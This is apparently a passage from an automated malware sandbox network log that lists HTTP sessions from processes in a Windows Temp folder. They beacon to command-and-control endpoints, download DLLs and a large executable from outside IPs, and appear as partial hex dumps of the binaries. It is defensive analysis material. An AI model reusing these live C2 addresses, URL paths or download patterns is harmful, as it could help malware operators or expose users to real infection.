Dec 22, 2024 02:18:46.528183937 CET	1236	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:46 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Dec 22, 2024 02:18:47.553618908 CET	99	OUT	GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 22, 2024 02:18:47.990360975 CET	1236	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:47 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.4	50164	185.215.113.43	80	2472	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:18:30.743231058 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 22, 2024 02:18:32.060641050 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 22 Dec 2024 01:18:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.4	50165	212.193.31.8	80	5172	C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:18:30.743709087 CET	312	OUT	POST /3ofn3jf3e2ljk2/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 212.193.31.8 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33 Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
Dec 22, 2024 02:18:32.076106071 CET	154	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:31 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.4	50166	185.215.113.43	80	2472	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:18:33.855252028 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 22, 2024 02:18:35.192888021 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 22 Dec 2024 01:18:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.4	50167	212.193.31.8	80	5172	C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:18:33.975438118 CET	160	OUT	POST /3ofn3jf3e2ljk2/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 212.193.31.8 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 22, 2024 02:18:35.262638092 CET	155	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:35 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.4	50170	185.156.73.23	80	5548	C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:18:34.936768055 CET	395	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 185.156.73.23 Connection: Keep-Alive Cache-Control: no-cache
Dec 22, 2024 02:18:36.263226986 CET	204	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:35 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.4	50171	212.193.31.8	80	5172	C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:18:37.014396906 CET	312	OUT	POST /3ofn3jf3e2ljk2/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 212.193.31.8 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33 Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
Dec 22, 2024 02:18:38.307065010 CET	154	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:38 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.4	50172	185.215.113.43	80	2472	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:18:37.156591892 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 22, 2024 02:18:38.476145983 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 22 Dec 2024 01:18:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.4	50173	185.156.73.23	80	5548	C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:18:38.979893923 CET	395	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 185.156.73.23 Connection: Keep-Alive Cache-Control: no-cache
Dec 22, 2024 02:18:40.283341885 CET	204	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:39 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.4	50175	212.193.31.8	80	5172	C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:18:40.631380081 CET	160	OUT	POST /3ofn3jf3e2ljk2/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 212.193.31.8 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 22, 2024 02:18:41.910341024 CET	155	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:41 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 8 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 33 3c 64 3e Data Ascii: <c>3<d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.4	50176	185.215.113.43	80	2472	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:18:40.631534100 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 22, 2024 02:18:41.936485052 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 22 Dec 2024 01:18:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.4	50178	185.215.113.16	80	7012	C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:18:42.039053917 CET	200	OUT	GET /off/def.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.215.113.16
Dec 22, 2024 02:18:43.359494925 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 22 Dec 2024 01:18:42 GMT Content-Type: application/octet-stream Content-Length: 2809344 Last-Modified: Sun, 22 Dec 2024 00:17:01 GMT Connection: keep-alive ETag: "67675a7d-2ade00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 20 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 2b 00 00 04 00 00 d9 47 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 44 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$ + `@ `+G+`Ui`D @ @ @.rsrcD``@.idata f@osxguznn`Ph@nksckbfu +@.taggant@ +"@
Dec 22, 2024 02:18:43.359586954 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 22, 2024 02:18:43.359661102 CET	448	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 22, 2024 02:18:43.359698057 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 22, 2024 02:18:43.359733105 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 22, 2024 02:18:43.359767914 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 22, 2024 02:18:43.359803915 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 22, 2024 02:18:43.360126019 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 22, 2024 02:18:43.360301018 CET	1236	IN	Data Raw: fd 59 fb 90 ff 37 19 27 59 ac 03 27 59 ad df 7a 59 88 29 27 53 37 df 27 59 37 df 27 59 f1 3d 27 56 9b df 27 5c 92 0f 24 59 21 e1 27 59 37 df 27 59 8f f3 26 59 b1 17 7a 59 37 fd 8e 4f 37 df 31 31 a6 df 27 57 bd 2c 27 59 c7 17 77 59 37 fd 94 94 37 Data Ascii: Y7'Y'YzY)'S7'Y7'Y='V'\$Y!'Y7'Y&YzY7O711'W,'YwY77k'i&YvY77k'i8&YvY7k]'i8&YvY7k'i8&YvY7k}'i8&YvY7k'i8&YvY7k&i8&YvY7k&i8&YvY7
Dec 22, 2024 02:18:43.360336065 CET	1236	IN	Data Raw: 5c e1 5f db 5c 96 e0 c1 d9 6c fa 87 5c b1 fd 8c 55 a7 e0 c1 d9 c3 df 84 5c e1 5f 3d 5b 8a e0 c1 d9 11 e1 84 5c e1 5f 95 56 8a e0 c1 d9 84 fa 83 5c e1 5f f1 56 8a e0 c1 d9 cc e1 84 5c e1 5f a6 5c 8a e0 c1 d9 d2 e0 84 5c e1 5f 8c 5b 8a e0 c1 d9 09 Data Ascii: \_\l\U\_=[\_V\_V\_\\_[\U\_r\&\_\\_5\\_\9\_+\\_Y\_I\&YWy\W&Yy\=X&YOy\PN&YYy\&Y7A0Y97'Y1U
Dec 22, 2024 02:18:43.479669094 CET	1236	IN	Data Raw: 59 2d e1 59 59 9a df ac 5c 89 df 7c 59 05 e1 59 59 8a df d4 5c 89 df 8c 59 f6 e0 59 59 7a df e8 5c 89 df 5c 59 f6 e0 59 59 ea df d4 5c 89 df 6c 59 70 e1 59 59 da df e8 5c 89 df bc 59 f6 e0 59 59 ca df 4a 5b 89 df cc 59 ae e1 59 59 ba df 73 5b ea Data Ascii: Y-YY\\|YYY\YYYz\\YYY\lYpYY\YYYJ[YYYs[YdYZYYZYD\"ZY\"ZY$YYYXYY`YY R'\&T1\X'\T'\X2\xU%\Y'\:X'\V'\Q#7

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.4	50179	185.156.73.23	80	5548	C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:18:42.604021072 CET	395	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 185.156.73.23 Connection: Keep-Alive Cache-Control: no-cache
Dec 22, 2024 02:18:43.922427893 CET	204	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:43 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.4	50181	212.193.31.8	80	5172	C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:18:43.940793037 CET	312	OUT	POST /3ofn3jf3e2ljk2/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 212.193.31.8 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33 Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
Dec 22, 2024 02:18:45.247055054 CET	154	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:45 GMT Server: Apache/2.4.58 (Ubuntu) Content-Length: 7 Content-Type: text/html; charset=UTF-8 Data Raw: 20 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.4	50182	185.215.113.43	80	2472	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:18:43.941020012 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 22, 2024 02:18:45.263942957 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 22 Dec 2024 01:18:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.4	50190	185.156.73.23	80	5548	C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:18:46.340518951 CET	395	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 185.156.73.23 Connection: Keep-Alive Cache-Control: no-cache
Dec 22, 2024 02:18:47.544327021 CET	204	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:47 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.4	50191	185.215.113.43	80	2472	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2024 02:18:47.377547026 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.4	50192	212.193.31.8	80	5172	C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe

Timestamp	Bytes transferred	Direction	Data
